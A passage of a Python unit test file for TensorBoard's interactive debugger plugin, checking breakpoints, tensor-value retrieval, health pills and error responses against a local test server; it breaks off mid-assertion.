self._debugger_url = 'grpc://localhost:%d' % self._debugger_port
context = base_plugin.TBContext(logdir=self._dummy_logdir,
multiplexer=self._dummy_multiplexer)
self._debugger_plugin = (
interactive_debugger_plugin.InteractiveDebuggerPlugin(context))
self._debugger_plugin.listen(self._debugger_port)
wsgi_app = application.TensorBoardWSGIApp(
self._dummy_logdir,
[self._debugger_plugin],
self._dummy_multiplexer,
reload_interval=0,
path_prefix='')
self._server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)
def tearDown(self):
# In some cases (e.g., an empty test method body), the stop_server() method
# may get called before the server is started, leading to a ValueError.
while True:
try:
self._debugger_plugin._debugger_data_server.stop_server()
break
except ValueError:
pass
shutil.rmtree(self._dummy_logdir, ignore_errors=True)
super(InteractiveDebuggerPluginTest, self).tearDown()
def _serverGet(self, path, params=None, expected_status_code=200):
"""Send the serve a GET request and obtain the response.
Args:
path: URL path (excluding the prefix), without parameters encoded.
params: Query parameters to be encoded in the URL, as a dict.
expected_status_code: Expected status code.
Returns:
Response from server.
"""
url = _SERVER_URL_PREFIX + path
if params:
url += '?' + urllib.parse.urlencode(params)
response = self._server.get(url)
self.assertEqual(expected_status_code, response.status_code)
return response
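# For example, _serverGet('comm', {'pos': 1}) issues a GET request to
# /data/plugin/debugger/comm?pos=1 against the test client.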
def _deserializeResponse(self, response):
"""Deserializes byte content that is a JSON encoding.
Args:
response: A response object.
Returns:
The deserialized python object decoded from JSON.
"""
return json.loads(response.get_data().decode("utf-8"))
def _runSimpleAddMultiplyGraph(self, variable_size=1):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable([10.0] * variable_size, name='a')
b = tf.Variable([20.0] * variable_size, name='b')
c = tf.Variable([30.0] * variable_size, name='c')
x = tf.multiply(a, b, name="x")
y = tf.add(x, c, name="y")
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(y))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def _runMultiStepAssignAddGraph(self, steps):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(10, dtype=tf.int32, name='a')
b = tf.Variable(1, dtype=tf.int32, name='b')
inc_a = tf.assign_add(a, b, name='inc_a')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
for _ in range(steps):
session_run_results.append(sess.run(inc_a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def _runTfGroupGraph(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(10, dtype=tf.int32, name='a')
b = tf.Variable(20, dtype=tf.int32, name='b')
d = tf.constant(1, dtype=tf.int32, name='d')
inc_a = tf.assign_add(a, d, name='inc_a')
inc_b = tf.assign_add(b, d, name='inc_b')
inc_ab = tf.group([inc_a, inc_b], name="inc_ab")
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(inc_ab))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testCommAndAckWithoutBreakpoints(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
self.assertGreater(response_data['timestamp'], 0)
self.assertEqual('meta', response_data['type'])
self.assertEqual({'run_key': ['', 'y:0', '']}, response_data['data'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetDeviceNamesAndDebuggerGraph(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
run_key = json.dumps(response_data['data']['run_key'])
device_names_response = self._serverGet(
'gated_grpc', {'mode': 'retrieve_device_names', 'run_key': run_key})
device_names_data = self._deserializeResponse(device_names_response)
self.assertEqual(1, len(device_names_data['device_names']))
device_name = device_names_data['device_names'][0]
graph_response = self._serverGet(
'debugger_graph', {'run_key': run_key, 'device_name': device_name})
self.assertTrue(graph_response.get_data())
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testRetrieveAllGatedGrpcTensors(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
run_key = json.dumps(response_data['data']['run_key'])
retrieve_all_response = self._serverGet(
'gated_grpc', {'mode': 'retrieve_all', 'run_key': run_key})
retrieve_all_data = self._deserializeResponse(retrieve_all_response)
self.assertTrue(retrieve_all_data['device_names'])
# No breakpoints have been activated.
self.assertEqual([], retrieve_all_data['breakpoints'])
device_name = retrieve_all_data['device_names'][0]
tensor_names = [item[0] for item
in retrieve_all_data['gated_grpc_tensors'][device_name]]
self.assertItemsEqual(
['a', 'a/read', 'b', 'b/read', 'x', 'c', 'c/read', 'y'], tensor_names)
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testActivateOneBreakpoint(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([200.0], comm_data['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that the activated breakpoint is remembered.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertEqual([['x', 0, 'DebugIdentity']], breakpoints_data)
def testActivateAndDeactivateOneBreakpoint(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Deactivate the breakpoint right away.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'disable'})
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that there is no breakpoint activated.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertEqual([], breakpoints_data)
def testActivateTwoBreakpoints(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for y:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'y', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([200.0], comm_data['data']['values'])
# Proceed to breakpoint y:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('y', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([230.0], comm_data['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that the activated breakpoints are remembered.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertItemsEqual(
[['x', 0, 'DebugIdentity'], ['y', 0, 'DebugIdentity']],
breakpoints_data)
def testCommResponseOmitsLargeSizedTensorValues(self):
session_run_thread, session_run_results = (
self._runSimpleAddMultiplyGraph(10))
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'y:0', '']}, comm_data['data'])
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to the breakpoint at x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([10], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
# Verify that the large-sized tensor gets omitted in the comm response.
self.assertEqual(None, comm_data['data']['values'])
# Use the /tensor_data endpoint to obtain the full value of x:0.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'x:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertAllClose([[200.0] * 10], tensor_data['tensor_data'])
# Use the /tensor_data endpoint to obtain the sliced value of x:0.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'x:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': '[:5]'})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertAllClose([[200.0] * 5], tensor_data['tensor_data'])
# Continue to the end.
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0] * 10], session_run_results)
def testMultipleSessionRunsTensorValueFullHistory(self):
session_run_thread, session_run_results = (
self._runMultiStepAssignAddGraph(2))
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'inc_a:0', '']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to inc_a:0 for the 1st time.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(11.0, comm_data['data']['values'])
# Call /tensor_data to get the full history of the inc_a tensor (so far).
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [11], 'error': None}, tensor_data)
# Continue to the beginning of the 2nd session.run.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'inc_a:0', '']}, comm_data['data'])
# Continue to inc_a:0 for the 2nd time.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 4})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(12.0, comm_data['data']['values'])
# Call /tensor_data to get the full history of the inc_a tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [11, 12], 'error': None}, tensor_data)
# Call /tensor_data to get the latest time index of the inc_a tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [12], 'error': None}, tensor_data)
# Continue to the end.
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([11.0, 12.0], session_run_results)
def testSetBreakpointOnNoTensorOp(self):
session_run_thread, session_run_results = self._runTfGroupGraph()
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', '', 'inc_ab']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for inc_ab.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_ab', 'output_slot': -1,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to inc_a:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(11.0, comm_data['data']['values'])
# Continue to the end. The breakpoint at inc_ab should not have blocked
# execution, because inc_ab is a tf.group op that produces no output.
self._serverGet('ack')
session_run_thread.join()
self.assertEqual([None], session_run_results)
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertItemsEqual(
[['inc_a', 0, 'DebugIdentity'], ['inc_ab', -1, 'DebugIdentity']],
breakpoints_data)
def testCommDataCanBeServedToMultipleClients(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
comm_data_1 = self._deserializeResponse(comm_response)
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for y:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'y', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data_2 = self._deserializeResponse(comm_response)
self.assertGreater(comm_data_2['timestamp'], 0)
self.assertEqual('tensor', comm_data_2['type'])
self.assertEqual('float32', comm_data_2['data']['dtype'])
self.assertEqual([1], comm_data_2['data']['shape'])
self.assertEqual('x', comm_data_2['data']['node_name'])
self.assertEqual(0, comm_data_2['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data_2['data']['debug_op'])
self.assertAllClose([200.0], comm_data_2['data']['values'])
# Proceed to breakpoint y:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data_3 = self._deserializeResponse(comm_response)
self.assertGreater(comm_data_3['timestamp'], 0)
self.assertEqual('tensor', comm_data_3['type'])
self.assertEqual('float32', comm_data_3['data']['dtype'])
self.assertEqual([1], comm_data_3['data']['shape'])
self.assertEqual('y', comm_data_3['data']['node_name'])
self.assertEqual(0, comm_data_3['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data_3['data']['debug_op'])
self.assertAllClose([230.0], comm_data_3['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# A 2nd client requests the comm data at positions 1, 2 and 3 again.
comm_response = self._serverGet('comm', {'pos': 1})
self.assertEqual(comm_data_1, self._deserializeResponse(comm_response))
comm_response = self._serverGet('comm', {'pos': 2})
self.assertEqual(comm_data_2, self._deserializeResponse(comm_response))
comm_response = self._serverGet('comm', {'pos': 3})
self.assertEqual(comm_data_3, self._deserializeResponse(comm_response))
def testInvalidBreakpointStateLeadsTo400Response(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Use an invalid state ('bad_state') when setting a breakpoint state.
response = self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'bad_state'},
expected_status_code=400)
data = self._deserializeResponse(response)
self.assertEqual('Unrecognized new state for x:0:DebugIdentity: bad_state',
data['error'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testInvalidModeArgForGatedGrpcRouteLeadsTo400Response(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Use an invalid mode argument ('bad_mode') when calling the 'gated_grpc'
# endpoint.
response = self._serverGet(
'gated_grpc',
{'mode': 'bad_mode', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'},
expected_status_code=400)
data = self._deserializeResponse(response)
self.assertEqual('Unrecognized mode for the gated_grpc route: bad_mode',
data['error'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testDebuggerHostAndGrpcPortEndpoint(self):
response = self._serverGet('debugger_grpc_host_port')
response_data = self._deserializeResponse(response)
self.assertTrue(response_data['host'])
self.assertEqual(self._debugger_port, response_data['port'])
def testGetSourceFilePaths(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
source_paths_response = self._serverGet('source_code', {'mode': 'paths'})
response_data = self._deserializeResponse(source_paths_response)
self.assertIn(__file__, response_data['paths'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetSourceFileContentWithValidFilePath(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
file_content_response = self._serverGet(
'source_code', {'mode': 'content', 'file_path': __file__})
response_data = self._deserializeResponse(file_content_response)
# Verify that the content of this file is included.
self.assertTrue(response_data['content'][__file__])
# Verify that for the lines of the file that create TensorFlow ops, the list
# of op names and their stack heights are included.
op_linenos = collections.defaultdict(set)
for lineno in response_data['lineno_to_op_name_and_stack_pos']:
self.assertGreater(int(lineno), 0)
for op_name, stack_pos in response_data[
'lineno_to_op_name_and_stack_pos'][lineno]:
op_linenos[op_name].add(lineno)
self.assertGreaterEqual(stack_pos, 0)
self.assertTrue(op_linenos['a'])
self.assertTrue(op_linenos['a/Assign'])
self.assertTrue(op_linenos['a/initial_value'])
self.assertTrue(op_linenos['a/read'])
self.assertTrue(op_linenos['b'])
self.assertTrue(op_linenos['b/Assign'])
self.assertTrue(op_linenos['b/initial_value'])
self.assertTrue(op_linenos['b/read'])
self.assertTrue(op_linenos['c'])
self.assertTrue(op_linenos['c/Assign'])
self.assertTrue(op_linenos['c/initial_value'])
self.assertTrue(op_linenos['c/read'])
self.assertTrue(op_linenos['x'])
self.assertTrue(op_linenos['y'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetSourceOpTraceback(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
for op_name in ('a', 'b', 'c', 'x', 'y'):
op_traceback_reponse = self._serverGet(
'source_code', {'mode': 'op_traceback', 'op_name': op_name})
response_data = self._deserializeResponse(op_traceback_reponse)
found_current_file = False
for file_path, lineno in response_data['op_traceback'][op_name]:
self.assertGreater(lineno, 0)
if file_path == __file__:
found_current_file = True
break
self.assertTrue(found_current_file)
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def _runInitializer(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable([10.0] * 10, name='a')
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
# Run the initializer with a debugger-wrapped tf.Session.
session_run_results.append(sess.run(a.initializer))
session_run_results.append(sess.run(a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testTensorDataForUninitializedTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runInitializer()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
self.assertEqual(2, len(session_run_results))
self.assertIsNone(session_run_results[0])
self.assertAllClose([10.0] * 10, session_run_results[1])
# Get tensor data without slicing.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data']
self.assertEqual(2, len(tensor_data))
self.assertIsNone(tensor_data[0])
self.assertAllClose([10.0] * 10, tensor_data[1])
# Get tensor data with slicing.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': '[:5]'})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data']
self.assertEqual(2, len(tensor_data))
self.assertIsNone(tensor_data[0])
self.assertAllClose([10.0] * 5, tensor_data[1])
def testCommDataForUninitializedTensorIsHandledCorrectly(self):
session_run_thread, _ = self._runInitializer()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('Uninitialized', comm_data['data']['dtype'])
self.assertEqual('Uninitialized', comm_data['data']['shape'])
self.assertEqual('N/A', comm_data['data']['values'])
self.assertEqual(
'a/(a)', comm_data['data']['maybe_base_expanded_node_name'])
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
def _runHealthPillNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(
[np.nan, np.inf, np.inf, -np.inf, -np.inf, -np.inf, 10, 20, 30],
dtype=tf.float32, name='a')
session_run_results.append(sess.run(a.initializer))
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testHealthPill(self):
session_run_thread, _ = self._runHealthPillNetwork()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data'][0]
self.assertAllClose(1.0, tensor_data[0]) # IsInitialized.
self.assertAllClose(9.0, tensor_data[1]) # Total count.
self.assertAllClose(1.0, tensor_data[2]) # NaN count.
self.assertAllClose(3.0, tensor_data[3]) # -Infinity count.
self.assertAllClose(0.0, tensor_data[4]) # Finite negative count.
self.assertAllClose(0.0, tensor_data[5]) # Zero count.
self.assertAllClose(3.0, tensor_data[6]) # Positive count.
self.assertAllClose(2.0, tensor_data[7]) # +Infinity count.
self.assertAllClose(10.0, tensor_data[8]) # Min.
self.assertAllClose(30.0, tensor_data[9]) # Max.
self.assertAllClose(20.0, tensor_data[10]) # Mean.
self.assertAllClose(
np.var([10.0, 20.0, 30.0]), tensor_data[11]) # Variance.
def _runAsciiStringNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
str1 = tf.Variable('abc', name='str1')
str2 = tf.Variable('def', name='str2')
str_concat = tf.add(str1, str2, name='str_concat')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(str_concat))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testAsciiStringTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runAsciiStringNetwork()
# Activate breakpoint for str1:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'str1', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('string', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('abc', comm_data['data']['values'])
self.assertEqual(
'str1/(str1)', comm_data['data']['maybe_base_expanded_node_name'])
session_run_thread.join()
self.assertEqual(1, len(session_run_results))
self.assertEqual(b"abcdef", session_run_results[0])
# Get the value of a tensor without mapping.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual(['abc'], tensor_data['tensor_data'])
# Get the health pill of a string tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual([None], tensor_data['tensor_data'])
def _runBinaryStringNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
str1 = tf.Variable([b'\x01' * 3, b'\x02' * 3], name='str1')
str2 = tf.Variable([b'\x03' * 3, b'\x04' * 3], name='str2')
str_concat = tf.add(str1, str2, name='str_concat')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(str_concat))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testBinaryStringTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runBinaryStringNetwork()
# Activate breakpoint for str1:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'str1', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('string', comm_data['data']['dtype'])
self.assertEqual([2], comm_data['data']['shape'])
self.assertEqual(2, len(comm_data['data']['values']))
self.assertEqual(
b'=01' * 3, tf.compat.as_bytes(comm_data['data']['values'][0]))
self.assertEqual(
b'=02' * 3, tf.compat.as_bytes(comm_data['data']['values'][1]))
self.assertEqual(
'str1/(str1)', comm_data['data']['maybe_base_expanded_node_name'])
session_run_thread.join()
self.assertEqual(1, len(session_run_results))
self.assertAllEqual(
np.array([b'\x01\x01\x01\x03\x03\x03', b'\x02\x02\x02\x04\x04\x04'],
dtype=np.object),
session_run_results[0])
# Get the value of a tensor without mapping.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual(2, len(tensor_data['tensor_data'][0]))
self.assertEqual(
b'=01=01=01', tf.compat.as_bytes(tensor_data['tensor_data'][0][0]))
self.assertEqual(
